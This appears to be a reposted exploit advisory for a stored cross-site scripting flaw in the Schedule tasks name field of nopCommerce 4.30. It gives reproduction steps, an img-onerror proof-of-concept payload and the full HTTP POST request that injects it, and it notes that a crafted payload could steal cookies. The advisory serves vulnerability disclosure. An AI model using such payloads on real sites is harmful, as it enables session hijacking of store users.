# Exploit Title: nopCommerce Store 4.30 - 'name' Stored Cross-Site Scripting
# Date: 24-11-2020
# Exploit Author: Hemant Patidar (HemantSolo)
# Vendor Homepage: https://www.nopcommerce.com/
# Version: 4.30
# Tested on: Windows 10/Kali Linux
Stored Cross-site scripting(XSS):
Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application.
Attack vector:
This vulnerability can results attacker to inject the XSS payload in Schedule tasks and each time any user will go to that page of the website, the XSS triggers and attacker can able to steal the cookie according to the crafted payload.
Vulnerable Parameters: Schedule tasks.
Steps-To-Reproduce:
1. Go to the nopCommerce Store admin page.
2. Now go to the System-Schedule tasks option.
3. Now click to on edit button on any task.
4. Put the below payload in Schedule tasks: "hemantsolo"><img src=x onerror=confirm(1)>"
5. Now click on Update button.
6. The XSS will be triggered.
POST /Admin/ScheduleTask/TaskUpdate HTTP/1.1
Host: 127.0.0.1
Connection: close
Content-Length: 335
Accept: application/json, text/javascript, */*; q=0.01
DNT: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: 127.0.0.1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: 127.0.0.1/Admin/ScheduleTask/List
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7,ru;q=0.6
Cookie: xyz
Id=5&Name=hemantsolo%22%3E%3Cimg+src%3Dx+onerror%3Dconfirm(1)%3E&Seconds=3600&Enabled=false&StopOnError=false&__RequestVerificationToken=CfDJ8Hstb5ORl7RLtnBnyhE10fENmFHuOPhDq-cN_XNT5gs_nUq2ht5UeggYY9Fea9OqSCeJnVy_e4IKpQ7HhLYwtOMRS76BYcfJ9Os-CI9BxTxrumbAaunwIxrDMZm6CbNRs9EPzKQabez4H7dNpXG6oVpiC5Pc__xQVm06bp4c4O_D15lqehkk6EmqDAizfm8LFA
This post was last modified on 25 November 2020 9:09 AM
British high street chain WH Smith has recently revealed that it was hit by a…
As banks worldwide roll out Voice ID as a means of user authentication over the…
In the era of digital transformation, cybersecurity has become a major concern for businesses. When…
In today's digital age, cybersecurity threats have become a significant concern for businesses of all…
The RIG Exploit Kit is currently in the midst of its most productive phase, attempting…
One of the most transformational technologies of our time, artificial intelligence (AI), has quickly come…
Leave a Comment